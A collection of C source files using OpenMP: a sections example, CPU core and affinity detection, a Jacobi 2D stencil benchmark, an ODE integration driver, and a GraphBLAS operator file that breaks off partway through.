source | c |
|---|---|
ex_sections_par.c | /******************************************************************************
* FILE: omp_workshare2.c
* DESCRIPTION:
* OpenMP Example - Sections Work-sharing - C Version
* In this example, the OpenMP SECTION directive is used to assign
* different array operations to each thread that executes a SECTION.
* AUTHOR: Blaise Barney 5/99
* LAST REVISED: 07/16/07
******************************************************************************/
#include <omp.h>
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#define N 100000000
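/* Four static arrays of N floats: 4 * 100,000,000 * 4 bytes = 1.6 GB of
   static data, so this example needs a machine with ample memory. */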
float a[N], b[N], c[N], d[N];
int main (int argc, char *argv[])
{
int i;
double t1,t2;
/* Some initializations */
for (i = 0; i < N; i++) {
a[i] = i * 1.5;
b[i] = i + 22.35;
c[i] = d[i] = 0.0;
}
t1 = omp_get_wtime();
#pragma omp parallel shared (a, b, c, d) private(i)
{
#pragma omp sections nowait
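/* nowait drops the implied barrier at the end of the sections construct;
   a thread that finishes its section proceeds directly to the end of the
   parallel region, whose own barrier still synchronizes before t2. */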
{
#pragma omp section
for (i = 0; i < N; i++) {
c[i] = sin(a[i] + b[i]);
}
#pragma omp section
for (i = 0; i < N; i++) {
d[i] = sqrt(a[i] * b[i]);
}
}
}
t2 = omp_get_wtime();
printf("Duration %g\n",t2-t1);
return 0;
}
|
cpu.c | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* License); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* AS IS BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
/*
* Parts of the code in this file refer to
* https://github.com/Tencent/ncnn/blob/master/src/cpu.cpp
* Tencent is pleased to support the open source community by making ncnn
* available.
*
* Copyright (C) 2017 THL A29 Limited, a Tencent company. All rights reserved.
*
* Licensed under the BSD 3-Clause License (the "License"); you may not use this
* file except in compliance with the License. You may obtain a copy of the
* License at
*
* https://opensource.org/licenses/BSD-3-Clause
*/
/*
* Copyright (c) 2021, OPEN AI LAB
* Author: lswang@openailab.com
*/
#include "cpu.h"
#include "api/c_api.h"
#include <stdio.h>
#include <string.h>
#include <limits.h>
#include <stdint.h>
#ifndef _MSC_VER
#include <pthread.h>
#include <sys/syscall.h>
#include <sched.h>
#include <unistd.h>
#endif
#if __APPLE__
#include "TargetConditionals.h"
#if TARGET_OS_IPHONE
#include <sys/types.h>
#include <sys/sysctl.h>
#include <mach/machine.h>
#define __APPLE_IOS__ 1
#endif
#endif
#ifdef _OPENMP
#include <omp.h>
#endif
static size_t core_count = 0;
static size_t affinity_mask_all_cluster = 0;
static size_t affinity_mask_big_cluster = 0;
static size_t affinity_mask_medium_cluster = 0;
static size_t affinity_mask_little_cluster = 0;
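// Each mask is a bitmap over logical cores: bit i is set when core i
// belongs to the corresponding cluster (all / big / medium / little).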
int init_cpu_count()
{
if (0 < core_count)
return core_count;
#ifdef __ANDROID__
{
FILE* cpu_info = fopen("/proc/cpuinfo", "rb");
if (!cpu_info)
return -1;
char buffer[1024];
while (!feof(cpu_info))
{
char* s = fgets(buffer, 1024, cpu_info);
if (!s)
break;
if (memcmp(buffer, "processor", 9) == 0)
core_count++;
}
fclose(cpu_info);
};
#elif __APPLE_IOS__
{
size_t len = sizeof(core_count);
sysctlbyname("hw.ncpu", &core_count, &len, NULL, 0);
};
#else
{
#ifdef _OPENMP
core_count = omp_get_max_threads();
#else
core_count = 1;
#endif
}
#endif
// check count range
if (core_count < 1)
core_count = 1;
// TODO: deal with this condition
if (core_count > sizeof(size_t) * 8)
core_count = sizeof(size_t) * 8;
return core_count;
}
#ifndef _MSC_VER
static int get_max_freq_khz(int cpuid)
{
// first try, for all possible cpu
char path[256];
sprintf(path, "/sys/devices/system/cpu/cpufreq/stats/cpu%d/time_in_state", cpuid);
FILE* fp = fopen(path, "rb");
if (!fp)
{
// second try, for online cpu
sprintf(path, "/sys/devices/system/cpu/cpu%d/cpufreq/stats/time_in_state", cpuid);
fp = fopen(path, "rb");
if (fp)
{
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1)
break;
if (freq_khz > max_freq_khz)
max_freq_khz = freq_khz;
}
fclose(fp);
if (max_freq_khz != 0)
return max_freq_khz;
fp = NULL;
}
if (!fp)
{
// third try, for online cpu
sprintf(path, "/sys/devices/system/cpu/cpu%d/cpufreq/cpuinfo_max_freq", cpuid);
fp = fopen(path, "rb");
if (!fp)
return -1;
int max_freq_khz = -1;
int ret = fscanf(fp, "%d", &max_freq_khz);
fclose(fp);
if (ret != 1 || max_freq_khz <= 0)
return -1;
else
return max_freq_khz;
}
}
int max_freq_khz = 0;
while (!feof(fp))
{
int freq_khz = 0;
int nscan = fscanf(fp, "%d %*d", &freq_khz);
if (nscan != 1)
break;
if (freq_khz > max_freq_khz)
max_freq_khz = freq_khz;
}
fclose(fp);
return max_freq_khz;
}
static int set_sched_affinity(size_t thread_affinity_mask)
{
// cpu_set_t definition
// ref http://stackoverflow.com/questions/16319725/android-set-thread-affinity
#ifndef CPU_SETSIZE
#define CPU_SETSIZE 1024
#endif
#ifndef __NCPUBITS
#define __NCPUBITS (8 * sizeof (unsigned long))
#endif
typedef struct
{
unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;
#define CPU_SET(cpu, cpusetp) ((cpusetp)->__bits[(cpu) / __NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
#define CPU_ZERO(cpusetp) memset((cpusetp), 0, sizeof(cpu_set_t))
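// Minimal re-implementations of the glibc cpu_set_t macros for toolchains
// (e.g. older Android NDKs) that do not expose them; see the reference above.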
// set affinity for threads
#if (defined __GLIBC__) || (defined _OHOS_) || (defined V831)
pid_t pid = syscall(SYS_gettid);
#else
#ifdef PI3
pid_t pid = getpid();
#else
#ifdef __APPLE__
uint64_t tid64;
pthread_threadid_np(NULL, &tid64);
pid_t pid = (pid_t)tid64;
#else
pid_t pid = gettid();
#endif
#endif
#endif
cpu_set_t mask;
CPU_ZERO(&mask);
// for (int i = 0; i < ( int )sizeof(size_t) * 8; i++)
for (int i = 0; i < core_count; i++)
{
if (thread_affinity_mask & ((size_t)1 << i))
CPU_SET(i, &mask);
}
#if __APPLE__
int syscallret = syscall(set_sched_affinity, pid, sizeof(mask), &mask);
#else
int syscallret = syscall(__NR_sched_setaffinity, pid, sizeof(mask), &mask);
#endif
if (syscallret)
{
fprintf(stderr, "syscall error %d\n", syscallret);
return -1;
}
return 0;
}
#endif
int init_cluster_mask()
{
init_cpu_count();
if (0 != affinity_mask_all_cluster)
return 0;
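// Build a bitmap with one bit per detected core (bits 0 .. core_count-1).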
affinity_mask_all_cluster = ((size_t)(1) << core_count) - (size_t)(1);
//affinity_mask_all_cluster = (size_t)(0) - (size_t)(1);
#ifndef _MSC_VER
int max_freq_min_val = INT_MAX;
int max_freq_max_val = 0;
// TODO: deal with very large count of cores
int max_freq_array[sizeof(size_t) * 8];
for (int i = 0; i < core_count; i++)
{
int max_freq_khz = get_max_freq_khz(i);
// fprintf(stderr, "cpu %d, max_freq_khz %d\n", i, max_freq_khz);
max_freq_array[i] = max_freq_khz;
if (max_freq_khz > max_freq_max_val)
max_freq_max_val = max_freq_khz;
if (max_freq_khz < max_freq_min_val)
max_freq_min_val = max_freq_khz;
}
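// Group cores by their maximum frequency: cores at the global maximum form
// the big cluster, cores at the global minimum the little cluster, and any
// frequency in between the medium cluster. If all cores report the same
// frequency the topology is symmetric and every core counts as big.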
if (max_freq_max_val == max_freq_min_val)
{
affinity_mask_big_cluster = affinity_mask_all_cluster;
affinity_mask_medium_cluster = 0;
affinity_mask_little_cluster = 0;
}
else
{
for (int i = 0; i < core_count; i++)
{
if (max_freq_array[i] == max_freq_max_val)
affinity_mask_big_cluster |= ((size_t)1 << i);
else if (max_freq_array[i] == max_freq_min_val)
affinity_mask_little_cluster |= ((size_t)1 << i);
else
affinity_mask_medium_cluster |= ((size_t)1 << i);
}
}
#else
// TODO implement me for other platforms
affinity_mask_big_cluster = affinity_mask_all_cluster;
#endif
return 0;
}
int check_cpu()
{
init_cpu_count();
init_cluster_mask();
return 0;
}
int get_cpu_mask_count(size_t mask)
{
int count = 0;
for (int i = 0; i < core_count; i++)
if (mask & ((size_t)1 << i))
count++;
return count;
}
int set_cpu_affine(size_t mask)
{
#if defined __ANDROID__ || defined __linux__
int count = get_cpu_mask_count(mask);
#ifdef _OPENMP
// set affinity for each thread
omp_set_num_threads(count);
int status[sizeof(size_t) * 8] = {0};
#pragma omp parallel for num_threads(count)
for (int i = 0; i < count; i++)
{
status[i] = set_sched_affinity(mask);
}
for (int i = 0; i < count; i++)
{
if (status[i] != 0)
return -1;
}
#else
int status = set_sched_affinity(mask);
if (0 != status)
return -1;
#endif
return 0;
#elif __APPLE_IOS__ || _MSC_VER
// thread affinity is not supported on iOS or MSVC
( void )mask;
return -1;
#else
int status = set_sched_affinity(mask);
if (0 != status) return -1;
return 0;
#endif
}
size_t get_cpu_cluster_mask(int cluster)
{
switch (cluster)
{
case TENGINE_CLUSTER_BIG:
if (0 != affinity_mask_big_cluster)
return affinity_mask_big_cluster;
break;
case TENGINE_CLUSTER_MEDIUM:
if (0 != affinity_mask_medium_cluster)
return affinity_mask_medium_cluster;
break;
case TENGINE_CLUSTER_LITTLE:
if (0 != affinity_mask_little_cluster)
return affinity_mask_little_cluster;
break;
default:
break;
}
return affinity_mask_all_cluster;
}
|
OMP-Jacobi-2D-Naive-Parallel.test.c | #include <stdio.h>
#include <omp.h>
#include <time.h>
#include <stdlib.h>
//#include <unistd.h>
#include <getopt.h>
#include <stdbool.h>
#include <ctype.h>
#include <math.h>
#include <assert.h>
bool initialized = false;
int globalSeed = -1;
int cores = -1;
int FP_OPS_PER_ITERATION = 5; // just used for outputting approximate MFLOPS
int problemSize = -1, T = -1, lowerBound = -1, upperBound = -1;
double** space[2] = { NULL, NULL }; // space[t][x][y] for (t,x,y) in { {0,1} X {lowerBound, ..., upperBound} X {lowerBound, ..., upperBound} }
void init(){
// if init has not already been called (preserves things like the global seed)
if( ! initialized ){
// note the convention someVar = ( someVar == -1 )? defaultValue : someVar ;
// this allows us to use the cmd line flags to set variables, AND have an init call.
// all values are initialized with -1 in global space, so if someVar == -1, then it has
// not been set, and can be given a default value.
// seed for random number generator.
// allows all initSpace calls to generate the same initial values
globalSeed = (globalSeed== -1)? time(NULL) : globalSeed;
// problemSpace parameters
T = (T == -1)? 100 : T;
problemSize = (problemSize == -1)? 100 : problemSize;
lowerBound = 1;
upperBound = lowerBound + problemSize - 1;
cores = (cores == -1)? omp_get_num_procs() : cores ;
omp_set_num_threads( cores );
// set initialization flag
initialized = true;
}
}
// initialize space array
void initSpace(){
int i;
// if space has been previously allocated, free the rows first and then the
// row-pointer arrays (assumes problemSize is unchanged since they were allocated).
if( space[0] != NULL ){
for( i = 0; i < problemSize + 2; ++i ){
free( space[0][i] );
}
free( space[0] );
space[0] = NULL;
}
if( space[1] != NULL ){
for( i = 0; i < problemSize + 2; ++i ){
free( space[1][i] );
}
free( space[1] );
space[1] = NULL;
}
/*
// allocate time steps 0 and 1
space = (double***) malloc( 2 * sizeof(double**) );
if( space == NULL ){
printf( "Could not allocate time steps of space array\n" );
exit(0);
}
*/
// allocate x axis
space[0] = (double**) malloc( (problemSize + 2) * sizeof(double*));
space[1] = (double**) malloc( (problemSize + 2) * sizeof(double*));
if( space[0] == NULL || space[1] == NULL ){
printf( "Could not allocate x axis of space array\n" );
exit(0);
}
// allocate y axis
for( i = 0; i < problemSize + 2; ++i ){
space[0][i] = (double*) malloc( (problemSize + 2) * sizeof(double));
space[1][i] = (double*) malloc( (problemSize + 2) * sizeof(double));
if( space[0][i] == NULL || space[1][i] == NULL ){
printf( "Could not allocate y axis of space array\n" );
exit(0);
}
}
// use global seed to seed the random number gen (will be constant)
srand(globalSeed);
// seed the space.
int x, y;
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
space[0][x][y] = rand() / (double)rand();
}
}
// set halo values (sanity)
for( i = 0; i < problemSize + 2; ++i){
space[0][i][0] = 0;
space[1][i][0] = 0;
space[0][i][problemSize + 1] = 0;
space[1][i][problemSize + 1] = 0;
space[0][0][i] = 0;
space[1][0][i] = 0;
space[0][problemSize + 1][i] = 0;
space[1][problemSize + 1][i] = 0;
}
}
// stencil call.
void stencil( int read, int write, int x, int y ){
// 5-point Jacobi update: unweighted average of the point and its four nearest neighbors
space[write][x][y] = ( space[read][x-1][y] + space[read][x][y] + space[read][x+1][y] + space[read][x][y+1] + space[read][x][y-1] )/5;
}
// parse int abstraction from strtol
int parseInt( char* string ){
return (int) strtol( string, NULL, 10 );
}
// returns true if valid result
bool verifyResult( bool verbose ){
assert( space[0] != NULL && space[1] != NULL );
double** endSpace;
endSpace = (double**) malloc( (problemSize + 2) * sizeof(double*));
if( endSpace == NULL ){
printf( "Could not allocate x axis of verification array\n" );
exit(0);
}
// allocate y axis
for( int x = 0; x < problemSize + 2; ++x ){
endSpace[x] = (double*) malloc( (problemSize + 2) * sizeof(double));
if( endSpace[x] == NULL ){
printf( "Could not allocate y axis of verification array\n" );
exit(0);
}
}
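// Snapshot the (parallel) result before recomputing serially: the two
// buffers alternate every time step, so after T steps the freshest data
// is in space[T & 1].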
for( int x = 0; x < problemSize + 2; ++x ){
for( int y = lowerBound; y <= upperBound; ++y ){
endSpace[x][y] = space[ T & 1 ][x][y];
}
}
initSpace();
int t, x, y, read = 0, write = 1;
for( t = 1; t <= T; ++t ){
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
stencil( read, write, x, y);
}
}
read = write;
write = 1 - write;
}
bool failed = false;
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
if( endSpace[x][y] != space[ T & 1 ][x][y] ){
failed = true;
if( verbose ) printf( "FAILED\n"); //! %f != %f at %d, %d\n", endSpace[x][y],space[ T & 1 ][x][y], x, y);
break;
}
}
if( failed ) break;
}
if( verbose && !failed ) printf( "SUCCESS\n" );
for( int x = 0; x < problemSize + 2; ++x ){
free( endSpace[x] );
}
free( endSpace );
return !failed;
}
#define STENCIL(read,write,x,y) space[write][x][y] = ( space[read][x-1][y] + space[read][x][y] + space[read][x+1][y] + space[read][x][y+1] + space[read][x][y-1] )/5
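// Macro version of stencil() for the timed loop; it avoids per-point call
// overhead in case the compiler does not inline the function.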
// naive parallel iteration test suite
double test_1(){
int t, x, y, read = 0, write = 1;
double start_time = omp_get_wtime();
for( t = 1; t <= T; ++t ){
{
#pragma omp parallel for private( x, y ) schedule(dynamic)
for( x = lowerBound; x <= upperBound; ++x ){
for( y = lowerBound; y <= upperBound; ++y ){
STENCIL( read, write, x, y);
}
}
}
read = write;
write = 1 - write;
}
double end_time = omp_get_wtime();
return (end_time - start_time);
}
int main( int argc, char* argv[] ){
setbuf(stdout, NULL); // set buffer to null, so prints ALWAYS print (for debug purposes mainly)
bool verify = false;
bool printtime = true;
// Command line parsing
int c; // getopt() returns an int; a char would break the != -1 test where char is unsigned
while ((c = getopt (argc, argv, "nc:s:p:T:hv")) != -1){
switch( c ) {
case 'n': // print time
printtime = false;
break;
case 'c': // cores
cores = parseInt( optarg );
if( cores <= 0 ){
fprintf(stderr, "cores must be greater than 0: %d\n", cores);
exit( 0 );
}
break;
case 'p': // problem size
problemSize = parseInt( optarg );
if( problemSize <= 0 ){
fprintf(stderr, "problemSize must be greater than 0: %d\n", problemSize);
exit( 0 );
}
break;
case 'T': // T (time steps)
T = parseInt( optarg );
if( T <= 0 ){
fprintf(stderr, "T must be greater than 0: %d\n", T);
exit( 0 );
}
break;
case 'h': // help
printf("usage: %s\n-n \t dont print time \n-p <problem size> \t problem size in elements \n-T <time steps>\t number of time steps\n-c <cores>\tnumber of threads\n-h\tthis dialogue\n-v\tverify output\n", argv[0]);
exit(0);
case 'v': // verify;
verify = true;
break;
case '?':
if (optopt == 'p')
fprintf (stderr, "Option -%c requires positive int argument: problem size.\n", optopt);
else if (optopt == 'T')
fprintf (stderr, "Option -%c requires positive int argument: T.\n", optopt);
else if (optopt == 's')
fprintf (stderr, "Option -%c requires int argument: subset_s.\n", optopt);
else if (optopt == 'c')
fprintf (stderr, "Option -%c requires int argument: number of cores.\n", optopt);
else if (isprint (optopt))
fprintf (stderr, "Unknown option `-%c'.\n", optopt);
else
fprintf(stderr, "Unknown option character `\\x%x'.\n", optopt);
exit(0);
default:
exit(0);
}
}
init();
initSpace();
double time = test_1();
if( printtime ){
printf( "Time: %f\n", time );
}
if( verify ){
verifyResult( true );
}
}
|
solver_generic.c | /**
* \file
* \brief the generic integration driver for the CPU solvers
*
* \author Nicholas Curtis
* \date 03/10/2015
*
*/
#include "header.h"
#include "solver.h"
#ifdef GENERATE_DOCS
namespace generic {
#endif
/**
* \brief Integration driver for the CPU integrators
* \param[in] NUM The (non-padded) number of IVPs to integrate
* \param[in] t The current system time
* \param[in] t_end The IVP integration end time
* \param[in] pr_global The system constant variable (pressures / densities)
* \param[in,out] y_global The system state vectors at time t.
Returns system state vectors at time t_end
*
* This is the generic driver for the CPU integrators
*/
void intDriver (const int NUM, const double t, const double t_end,
const double *pr_global, double *y_global)
{
int tid;
#pragma omp parallel for shared(y_global, pr_global) private(tid)
for (tid = 0; tid < NUM; ++tid) {
// local array with initial values
double y_local[NSP];
double pr_local = pr_global[tid];
// load local array with initial values from global array
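// y_global is stored species-major (struct-of-arrays): element i of IVP
// tid lives at y_global[tid + i * NUM], so adjacent threads touch
// adjacent addresses for each species i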
for (int i = 0; i < NSP; i++)
{
y_local[i] = y_global[tid + i * NUM];
}
// call integrator for one time step
check_error(tid, integrate (t, t_end, pr_local, y_local));
// update global array with integrated values
for (int i = 0; i < NSP; i++)
{
y_global[tid + i * NUM] = y_local[i];
}
} //end tid loop
} // end intDriver
#ifdef GENERATE_DOCS
}
#endif |
GB_binop__first_int8.c | //------------------------------------------------------------------------------
// GB_binop: hard-coded functions for each built-in binary operator
//------------------------------------------------------------------------------
// SuiteSparse:GraphBLAS, Timothy A. Davis, (c) 2017-2021, All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0
//------------------------------------------------------------------------------
// If this file is in the Generated2/ folder, do not edit it
// (it is auto-generated from Generator/*).
#include "GB.h"
#ifndef GBCOMPACT
#include "GB_emult.h"
#include "GB_control.h"
#include "GB_ek_slice.h"
#include "GB_dense.h"
#include "GB_atomics.h"
#include "GB_bitmap_assign_methods.h"
#include "GB_binop__include.h"
// C=binop(A,B) is defined by the following types and operators:
// A+B function (eWiseAdd): GB (_AaddB__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_08__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_02__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_04__first_int8)
// A.*B function (eWiseMult): GB (_AemultB_bitmap__first_int8)
// A*D function (colscale): GB (_AxD__first_int8)
// D*A function (rowscale): GB (_DxB__first_int8)
// C+=B function (dense accum): GB (_Cdense_accumB__first_int8)
// C+=b function (dense accum): GB (_Cdense_accumb__first_int8)
// C+=A+B function (dense ewise3): GB ((none))
// C=A+B function (dense ewise3): GB (_Cdense_ewise3_noaccum__first_int8)
// C=scalar+B GB ((none))
// C=scalar+B' GB ((none))
// C=A+scalar GB ((none))
// C=A'+scalar GB ((none))
// C type: int8_t
// A type: int8_t
// B,b type: int8_t
// BinaryOp: cij = aij
#define GB_ATYPE \
int8_t
#define GB_BTYPE \
int8_t
#define GB_CTYPE \
int8_t
// true if the types of A and B are identical
#define GB_ATYPE_IS_BTYPE \
1
// true if the types of C and A are identical
#define GB_CTYPE_IS_ATYPE \
1
// true if the types of C and B are identical
#define GB_CTYPE_IS_BTYPE \
1
// aij = Ax [pA]
#define GB_GETA(aij,Ax,pA,A_iso) \
int8_t aij = GBX (Ax, pA, A_iso)
// bij = Bx [pB]
#define GB_GETB(bij,Bx,pB,B_iso) \
;
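// (FIRST(x,y) = x never reads its second operand, so no load of Bx is
// generated here)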
// declare scalar of the same type as C
#define GB_CTYPE_SCALAR(t) \
int8_t t
// cij = Ax [pA]
#define GB_COPY_A_TO_C(cij,Ax,pA,A_iso) \
cij = GBX (Ax, pA, A_iso)
// cij = Bx [pB]
#define GB_COPY_B_TO_C(cij,Bx,pB,B_iso) \
cij = GBX (Bx, pB, B_iso)
#define GB_CX(p) Cx [p]
// binary operator
#define GB_BINOP(z,x,y,i,j) \
z = x ;
// true if the binop must be flipped
#define GB_BINOP_FLIP \
0
// op is second
#define GB_OP_IS_SECOND \
0
// do the numerical phases of GB_add and GB_emult
#define GB_PHASE_2_OF_2
// hard-coded loops can be vectorized
#define GB_PRAGMA_SIMD_VECTORIZE GB_PRAGMA_SIMD
// disable this operator and use the generic case if these conditions hold
#define GB_DISABLE \
(GxB_NO_FIRST || GxB_NO_INT8 || GxB_NO_FIRST_INT8)
//------------------------------------------------------------------------------
// C += A+B, all 3 matrices dense
//------------------------------------------------------------------------------
#if 0
// The op must be MIN, MAX, PLUS, MINUS, RMINUS, TIMES, DIV, or RDIV.
void GB ((none))
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#include "GB_dense_ewise3_accum_template.c"
}
#endif
//------------------------------------------------------------------------------
// C = A+B, all 3 matrices dense
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_ewise3_noaccum__first_int8)
(
GrB_Matrix C,
const GrB_Matrix A,
const GrB_Matrix B,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_dense_ewise3_noaccum_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += B, accumulate a sparse matrix into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumB__first_int8)
(
GrB_Matrix C,
const GrB_Matrix B,
const int64_t *B_ek_slicing, const int B_ntasks, const int B_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
#include "GB_dense_subassign_23_template.c"
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C += b, accumulate a scalar into a dense matrix
//------------------------------------------------------------------------------
GrB_Info GB (_Cdense_accumb__first_int8)
(
GrB_Matrix C,
const GB_void *p_bwork,
const int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if 0
{
// get the scalar b for C += b, of type int8_t
int8_t bwork = (*((int8_t *) p_bwork)) ;
#include "GB_dense_subassign_22_template.c"
return (GrB_SUCCESS) ;
}
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = A*D, column scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_AxD__first_int8)
(
GrB_Matrix C,
const GrB_Matrix A, bool A_is_pattern,
const GrB_Matrix D, bool D_is_pattern,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_colscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// C = D*B, row scale with diagonal D matrix
//------------------------------------------------------------------------------
GrB_Info GB (_DxB__first_int8)
(
GrB_Matrix C,
const GrB_Matrix D, bool D_is_pattern,
const GrB_Matrix B, bool B_is_pattern,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *restrict Cx = (int8_t *) C->x ;
#include "GB_AxB_rowscale_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseAdd: C=A+B, C<M>=A+B, C<!M>=A+B
//------------------------------------------------------------------------------
GrB_Info GB (_AaddB__first_int8)
(
GrB_Matrix C,
const int C_sparsity,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool Ch_is_Mh,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
GB_WERK_DECLARE (M_ek_slicing, int64_t) ;
GB_WERK_DECLARE (A_ek_slicing, int64_t) ;
GB_WERK_DECLARE (B_ek_slicing, int64_t) ;
#include "GB_add_template.c"
GB_FREE_WORK ;
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, or C<M!>=A.*B where C is sparse/hyper
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_08__first_int8)
(
GrB_Matrix C,
const int C_sparsity,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict C_to_M,
const int64_t *restrict C_to_A,
const int64_t *restrict C_to_B,
const GB_task_struct *restrict TaskList,
const int C_ntasks,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_08_meta.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<#> = A.*B when A is sparse/hyper and B is bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_02__first_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const bool flipxy,
const int64_t *restrict Cp_kfirst,
const int64_t *A_ek_slicing, const int A_ntasks, const int A_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#if GB_BINOP_FLIP
// The operator is not commutative, and does not have a flipped
// variant. For example z=atan2(y,x).
if (flipxy)
{
// use fmult(y,x)
#undef GB_FLIPPED
#define GB_FLIPPED 1
#include "GB_emult_02_template.c"
}
else
{
// use fmult(x,y)
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
}
#else
// No need to handle the flip: the operator is either commutative, or
// has been handled by changing z=div(y,x) to z=rdiv(x,y) for example.
#undef GB_FLIPPED
#define GB_FLIPPED 0
#include "GB_emult_02_template.c"
#endif
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C<M> = A.*B, M sparse/hyper, A and B bitmap/full
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_04__first_int8)
(
GrB_Matrix C,
const GrB_Matrix M,
const bool Mask_struct,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *restrict Cp_kfirst,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_emult_04_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// eWiseMult: C=A.*B, C<M>=A.*B, C<!M>=A.*B where C is bitmap
//------------------------------------------------------------------------------
GrB_Info GB (_AemultB_bitmap__first_int8)
(
GrB_Matrix C,
const int ewise_method,
const GrB_Matrix M,
const bool Mask_struct,
const bool Mask_comp,
const GrB_Matrix A,
const GrB_Matrix B,
const int64_t *M_ek_slicing, const int M_ntasks, const int M_nthreads,
const int C_nthreads,
GB_Context Context
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
#include "GB_bitmap_emult_template.c"
return (GrB_SUCCESS) ;
#endif
}
//------------------------------------------------------------------------------
// Cx = op (x,Bx): apply a binary operator to a matrix with scalar bind1st
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Bx may be aliased
const GB_void *x_input,
const GB_void *Bx_input,
const int8_t *restrict Bb,
int64_t bnz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int8_t *Cx = (int8_t *) Cx_output ;
int8_t x = (*((int8_t *) x_input)) ;
int8_t *Bx = (int8_t *) Bx_input ;
int64_t p ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < bnz ; p++)
{
if (!GBB (Bb, p)) continue ;
; ;
Cx [p] = x ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// Cx = op (Ax,y): apply a binary operator to a matrix with scalar bind2nd
//------------------------------------------------------------------------------
#if 0
GrB_Info GB ((none))
(
GB_void *Cx_output, // Cx and Ax may be aliased
const GB_void *Ax_input,
const GB_void *y_input,
const int8_t *restrict Ab,
int64_t anz,
int nthreads
)
{
#if GB_DISABLE
return (GrB_NO_VALUE) ;
#else
int64_t p ;
int8_t *Cx = (int8_t *) Cx_output ;
int8_t *Ax = (int8_t *) Ax_input ;
int8_t y = (*((int8_t *) y_input)) ;
#pragma omp parallel for num_threads(nthreads) schedule(static)
for (p = 0 ; p < anz ; p++)
{
if (!GBB (Ab, p)) continue ;
int8_t aij = GBX (Ax, p, false) ;
Cx [p] = aij ;
}
return (GrB_SUCCESS) ;
#endif
}
#endif
//------------------------------------------------------------------------------
// C = op (x, A'): transpose and apply a binary operator
//------------------------------------------------------------------------------
#if 0
// cij = op (x, aij), no typecasting (in spite of the macro name)
#undef GB_CAST_OP
#define GB_CAST_OP(pC,pA) \
{ \
; ; \
Cx [pC] = x ; \
}
GrB_Info GB ((none))
(
GrB_Matrix C,
const GB_void *x_input,
const GrB_Matrix A,
